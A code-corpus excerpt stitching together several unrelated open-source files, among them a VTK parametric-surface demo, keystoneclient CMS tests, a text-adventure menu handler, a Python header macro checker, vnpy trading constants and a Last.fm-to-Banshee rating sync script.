parametricObjects.append(vtk.vtkParametricFigure8Klein())
parametricObjects.append(vtk.vtkParametricKlein())
parametricObjects.append(vtk.vtkParametricMobius())
parametricObjects[-1].SetRadius(2)
parametricObjects[-1].SetMinimumV(-0.5)
parametricObjects[-1].SetMaximumV(0.5)
parametricObjects.append(vtk.vtkParametricRandomHills())
parametricObjects[-1].AllowRandomGenerationOff()
parametricObjects.append(vtk.vtkParametricRoman())
parametricObjects.append(vtk.vtkParametricSuperEllipsoid())
parametricObjects[-1].SetN1(0.5)
parametricObjects[-1].SetN2(0.1)
parametricObjects.append(vtk.vtkParametricSuperToroid())
parametricObjects[-1].SetN1(0.2)
parametricObjects[-1].SetN2(3.0)
parametricObjects.append(vtk.vtkParametricTorus())
parametricObjects.append(vtk.vtkParametricSpline())
# Add some points to the parametric spline.
inputPoints = vtk.vtkPoints()
rng = vtk.vtkMinimalStandardRandomSequence()
rng.SetSeed(8775070)
for i in range(0, 10):
rng.Next()
x = rng.GetRangeValue(0.0, 1.0)
rng.Next()
y = rng.GetRangeValue(0.0, 1.0)
rng.Next()
z = rng.GetRangeValue(0.0, 1.0)
inputPoints.InsertNextPoint(x, y, z)
parametricObjects[-1].SetPoints(inputPoints)
parametricFunctionSources = list()
renderers = list()
mappers = list()
actors = list()
textmappers = list()
textactors = list()
# Create one text property for all
textProperty = vtk.vtkTextProperty()
textProperty.SetFontSize(12)
textProperty.SetJustificationToCentered()
backProperty = vtk.vtkProperty()
backProperty.SetColor(colors.GetColor3d("Tomato"))
# Create a parametric function source, renderer, mapper, and actor
# for each object
for i in range(0, len(parametricObjects)):
parametricFunctionSources.append(vtk.vtkParametricFunctionSource())
parametricFunctionSources[i].SetParametricFunction(parametricObjects[i])
parametricFunctionSources[i].SetUResolution(51)
parametricFunctionSources[i].SetVResolution(51)
parametricFunctionSources[i].SetWResolution(51)
parametricFunctionSources[i].Update()
mappers.append(vtk.vtkPolyDataMapper())
mappers[i].SetInputConnection(parametricFunctionSources[i].GetOutputPort())
actors.append(vtk.vtkActor())
actors[i].SetMapper(mappers[i])
actors[i].GetProperty().SetColor(colors.GetColor3d("Banana"))
actors[i].GetProperty().SetSpecular(.5)
actors[i].GetProperty().SetSpecularPower(20)
actors[i].SetBackfaceProperty(backProperty)
textmappers.append(vtk.vtkTextMapper())
textmappers[i].SetInput(parametricObjects[i].GetClassName())
textmappers[i].SetTextProperty(textProperty)
textactors.append(vtk.vtkActor2D())
textactors[i].SetMapper(textmappers[i])
textactors[i].SetPosition(100, 16)
renderers.append(vtk.vtkRenderer())
renderers[i].AddActor(actors[i])
renderers[i].AddActor(textactors[i])
renderers[i].SetBackground(colors.GetColor3d("BkgColor"))
# Setup the viewports
xGridDimensions = 4
yGridDimensions = 4
rendererSize = 200
renderWindow = vtk.vtkRenderWindow()
renderWindow.SetWindowName("Parametric Objects Demonstration")
renderWindow.SetSize(rendererSize * xGridDimensions, rendererSize * yGridDimensions)
for row in range(0, yGridDimensions):
for col in range(0, xGridDimensions):
index = row * xGridDimensions + col
# (xmin, ymin, xmax, ymax)
viewport = [float(col) / xGridDimensions,
float(yGridDimensions - (row + 1)) / yGridDimensions,
float(col + 1) / xGridDimensions,
float(yGridDimensions - row) / yGridDimensions]
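# e.g. in this 4x4 grid, row 0, col 0 yields the normalized
# viewport [0.0, 0.75, 0.25, 1.0] (the top-left cell).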
if index > (len(actors) - 1):
# Add a renderer even if there is no actor.
# This makes the render window background all the same color.
ren = vtk.vtkRenderer()
ren.SetBackground(colors.GetColor3d("BkgColor"))
ren.SetViewport(viewport)
renderWindow.AddRenderer(ren)
continue
renderers[index].SetViewport(viewport)
renderers[index].ResetCamera()
renderers[index].GetActiveCamera().Azimuth(30)
renderers[index].GetActiveCamera().Elevation(-30)
renderers[index].GetActiveCamera().Zoom(0.9)
renderers[index].ResetCameraClippingRange()
renderWindow.AddRenderer(renderers[index])
interactor = vtk.vtkRenderWindowInteractor()
interactor.SetRenderWindow(renderWindow)
renderWindow.Render()
interactor.Start()
if __name__ == '__main__':
main()
|
apache-2.0
| 3,249,549,297,955,955,000
| 36.827586
| 88
| 0.678213
| false
| 3.728756
| false
| false
| false
|
jamielennox/python-keystoneclient
|
keystoneclient/tests/test_cms.py
|
1
|
6122
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import errno
import os
import subprocess
import mock
import testresources
from testtools import matchers
from keystoneclient.common import cms
from keystoneclient import exceptions
from keystoneclient.tests import client_fixtures
from keystoneclient.tests import utils
class CMSTest(utils.TestCase, testresources.ResourcedTestCase):
"""Unit tests for the keystoneclient.common.cms module."""
resources = [('examples', client_fixtures.EXAMPLES_RESOURCE)]
def test_cms_verify(self):
self.assertRaises(exceptions.CertificateConfigError,
cms.cms_verify,
'data',
'no_exist_cert_file',
'no_exist_ca_file')
def test_token_tocms_to_token(self):
with open(os.path.join(client_fixtures.CMSDIR,
'auth_token_scoped.pem')) as f:
AUTH_TOKEN_SCOPED_CMS = f.read()
self.assertEqual(cms.token_to_cms(self.examples.SIGNED_TOKEN_SCOPED),
AUTH_TOKEN_SCOPED_CMS)
tok = cms.cms_to_token(cms.token_to_cms(
self.examples.SIGNED_TOKEN_SCOPED))
self.assertEqual(tok, self.examples.SIGNED_TOKEN_SCOPED)
def test_asn1_token(self):
self.assertTrue(cms.is_asn1_token(self.examples.SIGNED_TOKEN_SCOPED))
self.assertFalse(cms.is_asn1_token('FOOBAR'))
def test_cms_sign_token_no_files(self):
self.assertRaises(subprocess.CalledProcessError,
cms.cms_sign_token,
self.examples.TOKEN_SCOPED_DATA,
'/no/such/file', '/no/such/key')
def test_cms_sign_token_no_files_pkiz(self):
self.assertRaises(subprocess.CalledProcessError,
cms.pkiz_sign,
self.examples.TOKEN_SCOPED_DATA,
'/no/such/file', '/no/such/key')
def test_cms_sign_token_success(self):
self.assertTrue(
cms.pkiz_sign(self.examples.TOKEN_SCOPED_DATA,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_KEY_FILE))
def test_cms_verify_token_no_files(self):
self.assertRaises(exceptions.CertificateConfigError,
cms.cms_verify,
self.examples.SIGNED_TOKEN_SCOPED,
'/no/such/file', '/no/such/key')
def test_cms_verify_token_no_oserror(self):
def raise_OSError(*args):
e = OSError()
e.errno = errno.EPIPE
raise e
with mock.patch('subprocess.Popen.communicate', new=raise_OSError):
try:
cms.cms_verify("x", '/no/such/file', '/no/such/key')
except exceptions.CertificateConfigError as e:
self.assertIn('/no/such/file', e.output)
self.assertIn('Hit OSError ', e.output)
else:
self.fail('Expected exceptions.CertificateConfigError')
def test_cms_verify_token_scoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_TOKEN_SCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_scoped_expired(self):
cms_content = cms.token_to_cms(
self.examples.SIGNED_TOKEN_SCOPED_EXPIRED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_unscoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_TOKEN_UNSCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_verify_token_v3_scoped(self):
cms_content = cms.token_to_cms(self.examples.SIGNED_v3_TOKEN_SCOPED)
self.assertTrue(cms.cms_verify(cms_content,
self.examples.SIGNING_CERT_FILE,
self.examples.SIGNING_CA_FILE))
def test_cms_hash_token_no_token_id(self):
token_id = None
self.assertThat(cms.cms_hash_token(token_id), matchers.Is(None))
def test_cms_hash_token_not_pki(self):
"""If the token_id is not a PKI token then it returns the token_id."""
token = 'something'
self.assertFalse(cms.is_asn1_token(token))
self.assertThat(cms.cms_hash_token(token), matchers.Is(token))
def test_cms_hash_token_default_md5(self):
"""The default hash method is md5."""
token = self.examples.SIGNED_TOKEN_SCOPED
token_id_default = cms.cms_hash_token(token)
token_id_md5 = cms.cms_hash_token(token, mode='md5')
self.assertThat(token_id_default, matchers.Equals(token_id_md5))
# md5 hash is 32 chars.
self.assertThat(token_id_default, matchers.HasLength(32))
def test_cms_hash_token_sha256(self):
"""Can also hash with sha256."""
token = self.examples.SIGNED_TOKEN_SCOPED
token_id = cms.cms_hash_token(token, mode='sha256')
# sha256 hash is 64 chars.
self.assertThat(token_id, matchers.HasLength(64))
def load_tests(loader, tests, pattern):
return testresources.OptimisingTestSuite(tests)
|
apache-2.0
| -8,033,659,842,411,192,000
| 40.364865
| 78
| 0.601764
| false
| 3.929397
| true
| false
| false
|
rmed/textventures
|
src/textventures/instances/key_navigation.py
|
1
|
4144
|
# -*- coding: utf-8 -*-
# This file is part of TextVentures - https://github.com/RMed/textventures
#
# Copyright (C) 2013 Rafael Medina García <rafamedgar@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import menu, sys
class Listener:
"""Gets user input for navigation."""
def __init__(self):
# Check for Windows platform
if sys.platform.startswith('win'):
import msvcrt
# Check for UNIX platforms
else:
import tty
def __call__(self):
# Windows
if sys.platform.startswith('win'):
import msvcrt
# Save character
char = msvcrt.getch()
# UNIX
else:
import tty, termios
# Read character
fd = sys.stdin.fileno()
attr = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
char = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# Return character
return char
class Action:
"""Check the input character and act accordingly."""
def __init__(self, input_char, action_type):
"""Arguments:
input_char -- pressed character
action_type -- type of the action (menu, load, etc)
"""
self.char = input_char.lower()
self.action = action_type
def __call__(self):
# Check the action type
if self.action == 'main':
# Main menu
if self.char == 'n':
# New game menu
menu.newgame_menu()
elif self.char == 'l':
# Load game menu
menu.load_menu()
elif self.char == 'o':
# Options menu
menu.options_menu()
elif self.char == 'h':
# Help menu
menu.help_menu()
elif self.char == 'a':
# About menu
menu.about_menu()
elif self.char == 'e':
# Exit program
sys.exit()
elif self.action == 'load':
# Load menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose game
return self.char
elif self.action == 'options':
# Load menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose language
return self.char
elif self.action == 'new':
# New game menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.char == 'c':
# Choose game
return self.char
elif self.action == 'help':
# Help menu
if self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.action == 'about':
# About menu
if self.char == 'l':
menu.show_license()
elif self.char == 'b':
# Back to main menu
menu.main_menu()
elif self.action == 'license':
# License
if self.char == 'b':
# Back to About menu
menu.about_menu()
|
gpl-2.0
| 5,757,127,063,372,303,000
| 30.150376
| 74
| 0.502052
| false
| 4.542763
| false
| false
| false
|
banansson/cask
|
cask.py
|
1
|
3281
|
#!/usr/bin/python
import sys
import argparse
from os import path
from src.bag import Bag
from src.package import Package
from src.task import Task
from src.message import Message
from src.application import Application
from src.application_info import ApplicationInfo
from src.bootstrap import Bootstrap
from src import utils
def run(argv):
default_packs_dir = "~/.config/cask/packs"
default_target_dir = "~"
parser = argparse.ArgumentParser()
actions = parser.add_mutually_exclusive_group()
actions.add_argument('--version', action='store_true',
help='Display version')
actions.add_argument('--bootstrap', action='store_true',
help='run bootstrap test')
parser.add_argument('command', nargs='?', help='Command to run: list, query, install')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='be verbose')
parser.add_argument('-d', '--dryrun', action='store_true',
help='run in test mode, nothing is installed')
parser.add_argument('-s', '--source', action='store',
default=default_packs_dir,
help='override directory in which to look for packages')
parser.add_argument('-t', '--target', action='store',
default=default_target_dir,
help='override directory in which to install packages')
parser.add_argument('package', nargs='?', help='Name of package')
args = parser.parse_args()
verbose = args.verbose
message = Message(sys.stdout, verbose > 0)
if args.bootstrap:
bootstrap = Bootstrap()
if args.verbose:
bootstrap.verbose(message)
else:
verifications = bootstrap.verify_all()
if not verifications[0]:
message.info('Bootstrap verification failed! Use verbose flag for more detailed output')
message.major('Errors:')
for error in verifications[1]:
message.minor(error)
else:
message.info('Bootstrap verification succeeded')
return 0
appinfo = ApplicationInfo()
if args.version:
message.info(appinfo.name())
return 0
if not(args.command or args.package):
message.info("No package specified, use -h or --help for help. Listing of")
message.info("all packages can be done using the 'list' argument.")
return 0
(valid, source) = utils.try_lookup_dir(args.source)
if not valid:
message.error("No such directory: %s" % source)
return 0
message.plain("Looking for packages in: %s" % source)
target = utils.lookup_dir(args.target)
bag = Bag(path.abspath(source))
app = Application(bag, message, args)
commands = {}
commands['list'] = lambda bag, message, args: app.list(verbose)
commands['query'] = lambda bag, message, args: app.query(args.package, target)
commands['install'] = lambda bag, message, args: app.install(args.package, target, args.dryrun)
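# Dispatch table: each command name maps to a closure over the shared
# Application instance, so adding a new command is a one-line change here.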
if not args.command:
message.info("No action specified, use -h or --help for help.")
return 0
cmd = args.command
if cmd not in commands:
message.info('No such command: {:s}'.format(cmd))
return 0
commands[cmd](bag, message, args)
return 0
if __name__ == '__main__':
code = run(sys.argv)
exit(code)
|
mit
| 1,634,004,693,254,727,000
| 29.663551
| 97
| 0.650716
| false
| 3.919952
| false
| false
| false
|
batermj/algorithm-challenger
|
code-analysis/programming_anguage/python/source_codes/Python3.8.0/Python-3.8.0/Tools/scripts/pep384_macrocheck.py
|
4
|
4720
|
"""
pep384_macrocheck.py
This program tries to locate errors in the relevant Python header
files where macros access type fields when they are reachable from
the limited API.
The idea is to search for macros with the string "->tp_" in them.
When the macro name does not begin with an underscore,
then we have found a dormant error.
Christian Tismer
2018-06-02
"""
import sys
import os
import re
DEBUG = False
def dprint(*args, **kw):
if DEBUG:
print(*args, **kw)
def parse_headerfiles(startpath):
"""
Scan all header files which are reachable from Python.h
"""
search = "Python.h"
name = os.path.join(startpath, search)
if not os.path.exists(name):
raise ValueError("file {} was not found in {}\n"
"Please give the path to Python's include directory."
.format(search, startpath))
errors = 0
with open(name) as python_h:
while True:
line = python_h.readline()
if not line:
break
found = re.match(r'^\s*#\s*include\s*"(\w+\.h)"', line)
if not found:
continue
include = found.group(1)
dprint("Scanning", include)
name = os.path.join(startpath, include)
if not os.path.exists(name):
name = os.path.join(startpath, "../PC", include)
errors += parse_file(name)
return errors
def ifdef_level_gen():
"""
Scan lines for #ifdef and track the level.
"""
level = 0
ifdef_pattern = r"^\s*#\s*if" # covers ifdef and ifndef as well
endif_pattern = r"^\s*#\s*endif"
while True:
line = yield level
if re.match(ifdef_pattern, line):
level += 1
elif re.match(endif_pattern, line):
level -= 1
def limited_gen():
"""
Scan lines for Py_LIMITED_API yes(1) no(-1) or nothing (0)
"""
limited = [0] # nothing
unlimited_pattern = r"^\s*#\s*ifndef\s+Py_LIMITED_API"
limited_pattern = "|".join([
r"^\s*#\s*ifdef\s+Py_LIMITED_API",
r"^\s*#\s*(el)?if\s+!\s*defined\s*\(\s*Py_LIMITED_API\s*\)\s*\|\|",
r"^\s*#\s*(el)?if\s+defined\s*\(\s*Py_LIMITED_API"
])
else_pattern = r"^\s*#\s*else"
ifdef_level = ifdef_level_gen()
status = next(ifdef_level)
wait_for = -1
while True:
line = yield limited[-1]
new_status = ifdef_level.send(line)
dir = new_status - status
status = new_status
if dir == 1:
if re.match(unlimited_pattern, line):
limited.append(-1)
wait_for = status - 1
elif re.match(limited_pattern, line):
limited.append(1)
wait_for = status - 1
elif dir == -1:
# this must have been an endif
if status == wait_for:
limited.pop()
wait_for = -1
else:
# it could be that we have an elif
if re.match(limited_pattern, line):
limited.append(1)
wait_for = status - 1
elif re.match(else_pattern, line):
limited.append(-limited.pop()) # negate top
def parse_file(fname):
errors = 0
with open(fname) as f:
lines = f.readlines()
type_pattern = r"^.*?->\s*tp_"
define_pattern = r"^\s*#\s*define\s+(\w+)"
limited = limited_gen()
status = next(limited)
for nr, line in enumerate(lines):
status = limited.send(line)
line = line.rstrip()
dprint(fname, nr, status, line)
if status != -1:
if re.match(define_pattern, line):
name = re.match(define_pattern, line).group(1)
if not name.startswith("_"):
# found a candidate, check it!
macro = line + "\n"
idx = nr
while line.endswith("\\"):
idx += 1
line = lines[idx].rstrip()
macro += line + "\n"
if re.match(type_pattern, macro, re.DOTALL):
# this type field can reach the limited API
report(fname, nr + 1, macro)
errors += 1
return errors
def report(fname, nr, macro):
f = sys.stderr
print(fname + ":" + str(nr), file=f)
print(macro, file=f)
if __name__ == "__main__":
p = sys.argv[1] if sys.argv[1:] else "../../Include"
errors = parse_headerfiles(p)
if errors:
# somehow it makes sense to raise a TypeError :-)
raise TypeError("These {} locations contradict the limited API."
.format(errors))
|
apache-2.0
| -1,668,539,338,901,291,500
| 30.891892
| 75
| 0.523517
| false
| 3.725335
| false
| false
| false
|
yongfuyang/vnpy
|
vn.trader/ctaAlgo/ctaBase.py
|
1
|
5912
|
# encoding: UTF-8
'''
本文件中包含了CTA模块中用到的一些基础设置、类和常量等。
'''
from __future__ import division
# 把vn.trader根目录添加到python环境变量中
import sys
sys.path.append('..')
# 常量定义
# CTA引擎中涉及到的交易方向类型
CTAORDER_BUY = u'买开'
CTAORDER_SELL = u'卖平'
CTAORDER_SELLTODAY = u'卖平今'
CTAORDER_SELLYESTERDAY = u'卖平昨'
CTAORDER_SHORT = u'卖开'
CTAORDER_COVER = u'买平'
CTAORDER_COVERTODAY = u'买今平'
CTAORDER_COVERYESTERDAY = u'买平昨'
DIRECTION_LONG = u'多'
DIRECTION_SHORT = u'空'
# 本地停止单状态
STOPORDER_WAITING = u'等待中'
STOPORDER_CANCELLED = u'已撤销'
STOPORDER_TRIGGERED = u'已触发'
# 本地停止单前缀
STOPORDERPREFIX = 'CtaStopOrder.'
# 数据库名称
SETTING_DB_NAME = 'VnTrader_Setting_Db'
POSITION_DB_NAME = 'VnTrader_Position_Db'
BARSIZE_DICT = {}
BARSIZE_DICT = {
0 : 'tick',
1 : '1 secs',
2 : '5 secs',
3 : '15 secs',
4 : '30 secs',
5 : '1 min',
6 : '2 mins',
7 : '3 min',
8 : '5 mins',
9 : '15 mins',
10 : '30 mins',
11 : '1 hour',
12 : '1 day'
}
# Cache tables in use
# temporary variables use barSize
BARSIZE_DFNAME_DICT = {}
BARSIZE_DFNAME_DICT = {
0 : 'df_tick',
1 : 'df_S_Bar',
2 : 'df_S5_Bar',
3 : 'df_S15_Bar',
4 : 'df_S30_Bar',
5 : 'df_M1_Bar',
6 : 'df_M2_Bar',
7 : 'df_M3_Bar',
8 : 'df_M5_Bar',
9 : 'df_M15_Bar',
10 : 'df_M30_Bar',
11 : 'df_H_Bar',
12 : 'df_D_Bar'
}
# Mapping from BARSIZE to local database names
# database names must match those in ctaBase
BARSIZE_DBNAME_DICT = {}
BARSIZE_DBNAME_DICT = {
0:'VnTrader_Tick_Db',
5:'VnTrader_1Min_Db',
8:'VnTrader_5Min_Db',
9: 'VnTrader_15Min_Db',
10: 'VnTrader_30Min_Db',
11: 'VnTrader_Hour_Db',
12: 'VnTrader_Daily_Db'
}
# Database names
SETTING_DB_NAME = 'VnTrader_Setting_Db'
TICK_DB_NAME = 'VnTrader_Tick_Db'
DAILY_DB_NAME = 'VnTrader_Daily_Db'
MINUTE_DB_NAME = 'VnTrader_1Min_Db' # minute database name, originally: 'VnTrader_1Min_Db'
# Added locally
HOUR_DB_NAME = 'VnTrader_Hour_Db'
MINUTE5_DB_NAME = 'VnTrader_5Min_Db'
MINUTE15_DB_NAME = 'VnTrader_15Min_Db'
MINUTE30_DB_NAME = 'VnTrader_30Min_Db'
# Engine type, used to distinguish the strategy's runtime environment
ENGINETYPE_BACKTESTING = 'backtesting' # backtesting
ENGINETYPE_TRADING = 'trading' # live trading
# Data class definitions used in the CTA engine
from vtConstant import EMPTY_UNICODE, EMPTY_STRING, EMPTY_FLOAT, EMPTY_INT
########################################################################
class StopOrder(object):
"""本地停止单"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING
self.orderType = EMPTY_UNICODE
self.direction = EMPTY_UNICODE
self.offset = EMPTY_UNICODE
self.price = EMPTY_FLOAT
self.volume = EMPTY_INT
self.strategy = None # strategy object that placed this stop order
self.stopOrderID = EMPTY_STRING # local stop order ID
self.status = EMPTY_STRING # stop order status
########################################################################
class CtaBarData(object):
"""K线数据"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # vt system symbol
self.symbol = EMPTY_STRING # symbol
self.exchange = EMPTY_STRING # exchange
self.open = EMPTY_FLOAT # OHLC
self.high = EMPTY_FLOAT
self.low = EMPTY_FLOAT
self.close = EMPTY_FLOAT
self.date = EMPTY_STRING # bar start date
self.time = EMPTY_STRING # bar start time
self.datetime = None # Python datetime object
self.volume = EMPTY_INT # volume
self.openInterest = EMPTY_INT # open interest
########################################################################
class CtaTickData(object):
"""Tick数据"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # vt system symbol
self.symbol = EMPTY_STRING # contract symbol
self.exchange = EMPTY_STRING # exchange code
# Trade data
self.lastPrice = EMPTY_FLOAT # last traded price
self.volume = EMPTY_INT # last traded volume
self.openInterest = EMPTY_INT # open interest
self.upperLimit = EMPTY_FLOAT # limit-up price
self.lowerLimit = EMPTY_FLOAT # limit-down price
# Tick timestamp
self.date = EMPTY_STRING # date
self.time = EMPTY_STRING # time
self.datetime = None # Python datetime object
# Five-level market depth quotes
self.bidPrice1 = EMPTY_FLOAT
self.bidPrice2 = EMPTY_FLOAT
self.bidPrice3 = EMPTY_FLOAT
self.bidPrice4 = EMPTY_FLOAT
self.bidPrice5 = EMPTY_FLOAT
self.askPrice1 = EMPTY_FLOAT
self.askPrice2 = EMPTY_FLOAT
self.askPrice3 = EMPTY_FLOAT
self.askPrice4 = EMPTY_FLOAT
self.askPrice5 = EMPTY_FLOAT
self.bidVolume1 = EMPTY_INT
self.bidVolume2 = EMPTY_INT
self.bidVolume3 = EMPTY_INT
self.bidVolume4 = EMPTY_INT
self.bidVolume5 = EMPTY_INT
self.askVolume1 = EMPTY_INT
self.askVolume2 = EMPTY_INT
self.askVolume3 = EMPTY_INT
self.askVolume4 = EMPTY_INT
self.askVolume5 = EMPTY_INT
|
mit
| 8,423,452,578,316,974,000
| 25.412935
| 79
| 0.514883
| false
| 2.730453
| false
| false
| false
|
OpenToAllCTF/OTA-Challenge-Bot
|
server/consolethread.py
|
1
|
1960
|
import threading
from bottypes.invalid_console_command import InvalidConsoleCommand
from util.loghandler import log
class ConsoleThread(threading.Thread):
def __init__(self, botserver):
self.botserver = botserver
threading.Thread.__init__(self)
def update_config(self, option, value):
try:
self.botserver.set_config_option(option, value)
except InvalidConsoleCommand as e:
log.error(e)
def show_set_usage(self):
print("\nUsage: set <option> <value>")
print("")
print("Available options:")
if self.botserver.config:
for config_option in self.botserver.config:
print("{0:20} = {1}".format(config_option,
self.botserver.config[config_option]))
print("")
def quit(self):
"""Inform the application that it is quitting."""
log.info("Shutting down")
self.running = False
def run(self):
self.running = True
while self.running:
try:
parts = input("").split(" ")
cmd = parts[0].lower()
if cmd == "quit":
self.botserver.quit()
break
# Example command: Useless, but just an example, for what
# console handler could do
elif cmd == "createchannel":
if len(parts) < 2:
print("Usage: createchannel <channel>")
else:
self.botserver.slack_wrapper.create_channel(parts[1])
elif cmd == "set":
if len(parts) < 3:
self.show_set_usage()
else:
self.update_config(parts[1], parts[2])
except Exception:
log.exception("An error has occured while processing a console command")
|
mit
| -3,119,133,389,237,143,600
| 31.131148
| 88
| 0.512245
| false
| 4.722892
| true
| false
| false
|
Thomasvdw/ProgProject
|
Data/PVdata/add_sum_capacity_perdate.py
|
1
|
4323
|
# -*- coding: utf-8 -*-
"""
Created on Wed May 27 20:06:01 2015
@author: Thomas
"""
# Python standard library imports
import csv
import os
def main():
sizes = []
for file in os.listdir("reformatted/"):
print file
size_total = []
size_2000 = []
size_2001 = []
size_2002 = []
size_2003 = []
size_2004 = []
size_2005 = []
size_2006 = []
size_2007 = []
size_2008 = []
size_2009 = []
size_2010 = []
size_2011 = []
size_2012 = []
size_2013 = []
size_2014 = []
size_2015 = []
name = "reformatted/" + file
with open(name, 'r') as csvfile:
reader = csv.reader(csvfile, delimiter = ",")
next(csvfile)
for row in reader:
date = str(row[4])
date = date[-4:]
try:
size = row[2]
size = float(size)
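# Treat implausible entries as data errors and zero them out:
# values above 200 (presumably kW) or with an over-long string form.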
if size > 200 or len(str(size)) > 6:
size = 0
if date < "2015":
size_2015.append(size)
if date < "2014":
size_2014.append(size)
if date < "2013":
size_2013.append(size)
if date < "2012":
size_2012.append(size)
if date < "2011":
size_2011.append(size)
if date < "2010":
size_2010.append(size)
if date < "2009":
size_2009.append(size)
if date < "2008":
size_2008.append(size)
if date < "2007":
size_2007.append(size)
if date < "2006":
size_2006.append(size)
if date < "2005":
size_2005.append(size)
if date < "2004":
size_2004.append(size)
if date < "2003":
size_2003.append(size)
if date < "2002":
size_2002.append(size)
if date < "2001":
size_2001.append(size)
if date < "2000":
size_2000.append(size)
size_total.append(size)
except ValueError:
pass
size2015 = sum(size_2015)
size2014 = sum(size_2014)
size2013 = sum(size_2013)
size2012 = sum(size_2012)
size2011 = sum(size_2011)
size2010 = sum(size_2010)
size2009 = sum(size_2009)
size2008 = sum(size_2008)
size2007 = sum(size_2007)
size2006 = sum(size_2006)
size2005 = sum(size_2005)
size2004 = sum(size_2004)
size2003 = sum(size_2003)
size2002 = sum(size_2002)
size2001 = sum(size_2001)
size2000 = sum(size_2000)
sizetotal = sum(size_total)
all_sizes = [int(size2015), int(size2014), int(size2013), int(size2012),
int(size2011), int(size2010), int(size2009), int(size2008),
int(size2007), int(size2006), int(size2005), int(size2004),
int(size2003), int(size2002), int(size2001), int(size2000),
int(sizetotal)]
sizes.append(all_sizes)
dates = ['1/1/2015', '1/1/2014', '1/1/2013', '1/1/2012',
'1/1/2011', '1/1/2010', '1/1/2009', '1/1/2008',
'1/1/2007', '1/1/2006', '1/1/2005', '1/1/2004',
'1/1/2003', '1/1/2002', '1/1/2001', '1/1/2000', "total"]
for x, file in enumerate(os.listdir("reformatted/")):
name = "population_energy_growth/solar_size/" + "solar_size_" + file
with open(name, 'wb') as f:
writer = csv.writer(f)
writer.writerow(['Date', 'Size'])
for i in range(17):
writer.writerow([dates[i], sizes[x][i]])
return sizes, dates
if __name__ == '__main__':
sizes, dates = main()
|
mit
| -6,894,113,067,600,910,000
| 31.757576
| 81
| 0.417303
| false
| 4.070621
| false
| false
| false
|
argvk/lastfmloved-syncer
|
update_banshee.py
|
1
|
1928
|
import sqlite3
import sys
import requests
import xml.dom.minidom
from os import path
con = None
artists = {}
url_params = {}
total_pages = -1
page_no = 0
user_name = sys.argv[1]
banshee_db = path.expanduser("~/.config/banshee-1/banshee.db")
con = sqlite3.connect(banshee_db)
cur = con.cursor()
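# Page through the Last.fm "lovedtracks" feed; the total page count is
# only known after the first response, hence the -1 sentinel above.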
while True:
if total_pages == page_no:
break
url_params['page'] = page_no
page_no = page_no + 1
r = requests.get("http://ws.audioscrobbler.com/2.0/user/" + user_name + "/lovedtracks.xml",params = url_params)
request_result = xml.dom.minidom.parseString(r.content)
if total_pages == -1:
total_pages = int(request_result.getElementsByTagName("lovedtracks")[0].attributes["totalPages"].value)
for track_data in request_result.getElementsByTagName("track"):
track_raw = track_data.getElementsByTagName("name")[0].firstChild.nodeValue
artist_raw = track_data.getElementsByTagName("name")[1].firstChild.nodeValue
track = track_raw.lower().replace("'","").replace(".","")
artist = artist_raw.lower().replace("'","").replace(".","")
print track,
print '|',
print artist,
print '|',
if artist not in artists:
cur.execute('SELECT ca.ArtistId FROM CoreArtists ca WHERE ca.NameLowered = ? LIMIT 1',(artist,))
row = cur.fetchone()
if row is None:
print 'artist not found'
continue
artists[artist] = row[0]
artist_id = artists[artist]
print artist_id,
print '|',
try:
with con:
cur.execute('UPDATE CoreTracks SET Rating = 5 WHERE CoreTracks.TitleLowered = ? AND CoreTracks.ArtistId = ? ', (track,artist_id,))
except sqlite3.Error, e:
print "error %s:" % e.args[0]
sys.exit(1)
print 'updated' ,cur.rowcount
if con:
con.close()
|
mit
| -6,483,506,008,347,363,000
| 25.777778
| 146
| 0.598029
| false
| 3.658444
| false
| false
| false
|
googleads/googleads-python-lib
|
examples/adwords/adwords_appengine_demo/views/add_campaign_view.py
|
1
|
2373
|
#!/usr/bin/env python
#
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles request to add a Campaign to a client account."""
import os
